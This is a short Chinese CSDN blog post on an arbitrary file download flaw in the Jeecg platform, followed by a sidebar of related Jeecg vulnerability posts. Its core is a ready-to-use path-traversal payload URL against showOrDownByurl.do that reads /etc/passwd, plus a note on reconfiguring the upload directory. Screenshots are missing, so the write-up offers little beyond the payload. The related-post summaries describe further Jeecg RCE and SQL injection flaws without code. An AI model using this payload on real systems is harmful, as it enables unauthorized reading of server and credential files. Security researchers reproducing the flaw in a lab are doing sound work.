Jeecg 任意文件下载漏洞

最新推荐文章于 2024-08-01 10:35:26 发布
最新推荐文章于 2024-08-01 10:35:26 发布
阅读量5.8k 收藏 1
点赞数
分类专栏: 代码审计 文章标签: jeecg 任意文件下载
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/he_and/article/details/103037565
版权


payload:
localhost:8080/jeecg_war/chat/imController/showOrDownByurl.do?dbPath=../../etc/passwd&down=1

它默认的文件路径是D://upFiles,我们部署在linux下把目录改为其他的任意目录,我这里修改为/tmp/uploads

在配置文件中进行修改(/src/main/resources/chat_config.properties)

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

tnt阿信
关注
专栏目录
Jeecg jeecgFormDemoController RCE漏洞复现(CVE-2023-49442)
0xSec
01-22 1297
Jeecg(J2EE Code Generation) 是开源的代码生成平台,目前官方已停止维护。Jeecg4.0及之前版本中,由于 /api 接口鉴权时未过滤路径遍历,攻击者可构造包含 ../ 的url绕过鉴权。并且内部有使用fastjson1.2.31漏洞版本,攻击者可构造恶意请求利用 jeecgFormDemoController.do?interfaceTest 接口进行 jndi 注入攻击实现远程代码执行,获取服务器权限。
Jeecg-Boot 存在前台SQL注入漏洞(CVE-2023-1454)
nnn2188185的博客
04-10 6361
jeecg-boot 3.5.0版本存在SQL注入漏洞,该漏洞源于文件 jmreport/qurestSql 存在安全问题, 通过参数 apiSelectId 导致SQL注入。
[代码审计]jeecg-boot最新权限绕过漏洞分析及新绕过发现
最新发布
LiangYueSec的博客
08-01 4190
[代码审计]jeecg-boot最新权限绕过分析及新绕过发现
Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)
qq_50854662的博客
05-24 1739
Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)
Jeecg-Boot 存在前台SQL注入漏洞【CVE-2023-1454】
holyxp的博客
07-02 4999
eecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,支持微服务。强大的代码生成器让前后端代码一键生成,实现低代码开发!JeecgBoot引领新低代码开发模式 OnlineCoding-> 代码生成器-> 手工MERGE, 帮助Java项目解决70%的重复工作,让开发更多关注业务,既能快速提高效率,节省研发成本,同时又不失灵活性!
JEECG-BOOT存在SQL注入漏洞[附POC]
Liyu_6618的博客
02-01 1620
JEECG-BOOT存在SQL注入漏洞[附POC]
JEECGBOOT代码SQL漏洞处理方案.zip
06-21
提供的压缩包文件"JEECGBOOT代码SQL漏洞处理方案"应该包含了针对这个问题的详细修复步骤和指导。用户应当立即下载并按照其中的说明进行操作,以保护他们的系统免受SQL注入的威胁。同时,为了防止未来类似的问题,...
Jeecg commonController 任意文件上传漏洞复现
0xSec
04-05 1512
JEECG(J2EE Code Generation) 是开源的代码生成平台,目前官方已停止维护。由于 /api 接口鉴权时未过滤路径遍历,攻击者可构造包含 ../ 的url绕过鉴权。攻击者可构造恶意请求利用 commonController 接口进行文件上传攻击实现远程代码执行,导致服务器被控。
HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞(含批量验证poc)
weixin_43567873的博客
03-29 276
HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞
jeecg文档.zip
09-23
文档包括:JEECG 权限开发手册、jeecg_v3.7表结构说明、JEECG 开发指南v3.7、JEECG 开发入门环境搭建(Maven-eclipse)3.7、JEECG UI标签文档v3.7.1、JEECG Online表单开发指南v3.7、JEECG Online表单对外接口v3.7、JEECG JEasyPoi技术指南
JEECG 社区开源项目下载
08-31
JEECG 社区开源项目下载
jeecg官方开发文档
11-19
jeecg提供的官方开发文档,如您所看,欢迎大家下载支持!
这款star数21.5k的开源项目(jeecg-boot)是怎么写出196个漏洞的?
xierqijianke的专栏
04-01 1496
一个开源的低代码平台项目咋写出来196个漏洞
Jeecg Word模板文件下载
Think_kill的博客
02-10 1026
后端处理代码 String fileName = id + "-成案线索登记.docx"; try { // 模板存放地址 String templateUrl = uploadpath + File.separator + "template" + File.separator + "clue_down_template.docx"; ModelAndView mv = new ModelAndView(new JeecgTemplateWordView()); mv.ad
Goby漏洞更新 | jeecg-boot 未授权SQL注入漏洞(CVE-2023-1454)
m0_46699477的博客
03-24 1980
jeecg-boot 未授权SQL注入漏洞(CVE-2023-1454)
CVE-2023-1454注入分析复现
蚁景网安学院
07-17 1888
JeecgBoot的代码生成器是一种可以帮助开发者快速构建企业级应用的工具,它可以通过一键生成前后端代码,无需写任何代码,让开发者更多关注业务逻辑。
JeecgBoot JimuReport testConnection RCE漏洞复现
0xSec
12-12 1973
JeecgBoot 的 jeecg-boot/jmreport/testConnection 未进行身份验证,并且未对 dbUrl 参数进行限制,当应用端存在H2数据库驱动依赖时,攻击者发送包含恶意 dbUrl 参数的 http 请求远程执行任意代码。
JEECG随笔--文件下载的配置与注意
烧猪 -- 记事本
01-29 1287
[code="java"] import com.opensymphony.xwork2.ActionSupport; import org.apache.struts2.convention.annotation.*; import java.io.FileInputStream; import java.io.FileNotFoundException; import java....
jeecg-boot testconnection 任意代码执行漏洞
12-28
jeecg-boot是一个基于SpringBoot的快速开发平台,提供了许多便捷的功能模块。然而,近期发现了jeecg-boot中的一个严重安全漏洞,即testconnection接口存在任意代码执行漏洞。 攻击者可以通过向testconnection接口发送恶意请求,成功执行任意后台代码,可能导致系统数据泄露、篡改甚至服务器被远程控制。这是一个非常危险的安全漏洞,需要尽快得到修复。 为了解决这个问题,开发团队需要立即发布更新版本,并在新版本中修复testconnection接口的漏洞。同时,通知所有用户立即升级到最新版本,并在升级后及时清理可能已经受到攻击影响的系统数据。 此外,开发团队还需要对jeecg-boot进行全面的安全审计,找出其他潜在的安全漏洞并进行修复。同时,加强对系统接口和数据的权限控制,提高系统的整体安全性。 最后,用户也要做好及时更新和安全防护工作,确保系统的安全运行。同时,注意及时关注官方公告和安全通报,以便获取最新的安全信息和修复方案。 总之,jeecg-boot testconnection任意代码执行漏洞是一个严重的安全威胁,需要开发团队、用户以及整个社区的共同努力来解决和预防类似问题的再次发生。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值